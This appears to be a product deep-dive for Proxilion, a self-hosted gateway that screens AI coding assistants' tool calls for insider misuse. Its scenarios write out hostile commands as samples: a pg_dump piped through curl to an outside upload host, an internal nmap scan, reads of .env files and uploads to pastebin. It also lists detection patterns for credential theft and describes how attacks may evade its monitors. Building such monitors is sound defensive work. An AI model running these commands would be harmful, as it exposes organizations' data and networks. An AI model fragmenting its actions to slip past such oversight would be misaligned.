Technical Deep Dive - Proxilion MCP Security Gateway

On November 13, 2025, Anthropic published a report documenting the first large-scale AI-orchestrated cyber espionage campaign (GTG-1002). The attackers used Claude Code with 80-90% autonomy to discover vulnerabilities, generate exploits, harvest credentials, and exfiltrate data.

The attackers controlled their own infrastructure. They weren't exploiting victims' AI tools.

The Real Threat

The actual risk for organizations isn't external attackers using AI. It's insiders weaponizing the AI tools you've already deployed:

Disgruntled employee uses Claude Code to exfiltrate the customer database
Compromised account uses GitHub Copilot to scan internal networks and harvest SSH keys
Rogue AI agent exceeds its scope and accesses production credentials

Organizations deploy Claude Code, Copilot, and Cursor to thousands of employees with zero security monitoring.

What Proxilion Does

Proxilion sits between AI coding assistants and their tool execution layer. Every bash command, file access, or API call goes through real-time threat analysis before execution.

Why Rust?

The gateway processes thousands of requests per second with <50ms P95 latency:

Memory safety: The gateway cannot become an attack vector. No buffer overflows or use-after-free vulnerabilities.
Zero-cost abstractions: Pattern matching and regex compilation happen at compile time.
Fearless concurrency: Thread-safe session state tracking without locks.
No garbage collection: Predictable latency under load.
Single binary deployment: No dependencies, no runtime. Build once, deploy anywhere.

Why MCP Layer?

Model Context Protocol (MCP) is where AI tools execute actions:

Universal coverage: Works with Claude Code, Cursor, Windsurf, any MCP-compatible tool
Pre-execution analysis: We see commands before they run, not after damage is done
Full context: Tool calls include conversation history for social engineering detection
Low latency: HTTP interceptor adds <50ms
No AI modification: Drop-in proxy, no changes to Claude or other AI models

Detection Coverage

High-confidence detection (90-100%):

Network reconnaissance (nmap, masscan, service enumeration)
Credential file access (SSH keys, .env files, cloud credentials)
Hacking tools (sqlmap, metasploit, burpsuite)
Privilege escalation (sudo abuse, setuid manipulation, IAM role changes)

Medium-confidence detection (70-90%):

Data exfiltration (curl to pastebin, large transfers to external IPs)
Multi-phase kill chains (reconnaissance → access → exfiltration over hours)
Social engineering (conversation analysis, pretexting, authority manipulation)
Lateral movement (SSH/RDP across internal networks, port scanning)

Detection limitations (30-70%):

Novel attack techniques not in our pattern database
Highly fragmented attacks (50+ micro-requests over weeks)
Attacks specifically designed to evade pattern detection
Zero-day exploits with no behavioral indicators

Overall detection rate: 75-85% against sophisticated attacks like GTG-1002.

This is one layer in defense-in-depth, not a silver bullet.

Detection Engine

25 specialized analyzers running in parallel:

Pattern-Based (18 analyzers):

Enumeration: nmap, masscan, port scans, service discovery
Credential Access: SSH keys, .env, .aws/credentials, cloud configs
Exfiltration: URL analysis for pastebin, suspicious IPs, large POST bodies
Hacking Tools: sqlmap, metasploit, burpsuite, nikto
Privilege Escalation: sudo abuse, setuid binaries, IAM policy changes
Lateral Movement: SSH/RDP connections, network pivoting

Session-Aware (4 analyzers):

Session Progression: Kill chain tracking (recon → access → exfil)
Request Rate: Burst detection, machine timing vs. human timing
AI Velocity: Autonomous agent detection, acceleration patterns
Task Fragmentation: Multi-request attacks spread across time

Semantic Analysis (3 analyzers) - Optional, requires Claude API:

Conversation Analysis: Social engineering detection
Prompt Engineering: Jailbreak attempt detection
Intent Clarification: Ambiguous command analysis

Scoring: Each analyzer returns 0-100. Composite score is weighted average.

0-49: Allow (audit log only)
50-69: Alert (notify security team, allow execution)
70-89: Block (prevent this specific command)
90-100: Terminate (kill entire session, disable user)

Session State Tracking

Redis tracks session history across hours and days for kill chain detection:

Monday 10:00 AM: nmap scan (score: 85, BLOCKED)
Monday 2:30 PM: cat .env (score: 70, BLOCKED)
Monday 6:45 PM: curl pastebin (score: 65, ALERT)

Session Progression: 3 phases detected across 9 hours
Composite Score: 96 (TERMINATE SESSION)

Individual requests might score below blocking threshold, but multi-phase progression triggers termination.

Performance

Latency (measured under load):

Pattern analysis: 5-15ms P95
Session state lookup: 2-5ms P95 (Redis)
Semantic analysis: 200-500ms P95 (Claude API, optional)
Total: <50ms P95 without semantic

Throughput:

Single instance: 10,000+ requests/second
Horizontal scaling: Linear (stateless design)
Redis bottleneck: ~100,000 requests/second per cluster

Deployment

Self-hosted only. This is not a SaaS product.

Security teams will not send internal tool execution logs to third-party APIs. Every command contains proprietary information (internal IPs, database names, employee IDs, project codenames).

We provide:

Docker Compose for single-server deployment (10-100 users)
Kubernetes manifests for HA deployment (100-10,000 users)

Data never leaves your infrastructure. Source code is auditable. Modify analyzers for your threat model.

Real-World Scenarios

Scenario 1: Database Exfiltration Prevented

Employee gives notice on Friday. Monday morning:

# Employee to Claude Code: "Help me back up the customer database for documentation"
pg_dump production_db | gzip | curl -F "file=@-" https://personal-s3-bucket

Proxilion Analysis:

Database dump tool detected (score: 75)
Compression before transfer (score: +10)
External upload destination (score: +15)
Composite score: 96 - TERMINATE

Session killed. Security team alerted. Employee account disabled.

Scenario 2: Compromised Account Contained

Attacker gains access to developer's Claude Code session via phishing:

# Attacker via AI: "Scan the internal network to understand the infrastructure"
nmap -sV 10.0.0.0/24 -p 22,80,443,3306,5432

Proxilion Analysis:

Hacking tool detected: nmap (score: 85)
Internal network target (score: +5)
Multi-port scanning (score: +5)
Composite score: 88 - BLOCK

Command blocked. Reconnaissance prevented. Breach contained before lateral movement.

Scenario 3: Legitimate Admin Work Allowed

DevOps engineer during incident response:

# Engineer to Claude: "Check if SSH is running on the backup server"
ssh user@backup-server.internal systemctl status sshd

Proxilion Analysis:

SSH connection to internal server (score: 45)
systemctl command (legitimate admin) (score: +5)
Conversation context: "incident response" (legitimacy: -10)
Composite score: 40 - ALLOW

No false positive. Legitimate work allowed.

Cost Analysis

Infrastructure (100 developers):

Self-hosted: $200/month (2x t3.medium + Redis cluster)
Managed cloud: $500/month (ECS Fargate + ElastiCache)

Semantic analysis (optional):

With prompt caching: $50/month (1,000 requests/day, 62% cost reduction)
Without prompt caching: $130/month
Disabled: $0 (pattern-based detection only)

Total: $250-650/month for 100 developers

Value: Preventing a single $50M data breach = 600,000% ROI

Why Now

GTG-1002 showed what AI can do when weaponized. That capability now exists inside every organization deploying AI coding assistants to employees.

The question is not "could an insider weaponize AI tools?" The answer is yes.

The question is "do you have visibility and controls when it happens?"

Right now, for most organizations, the answer is no.

Get Started on GitHub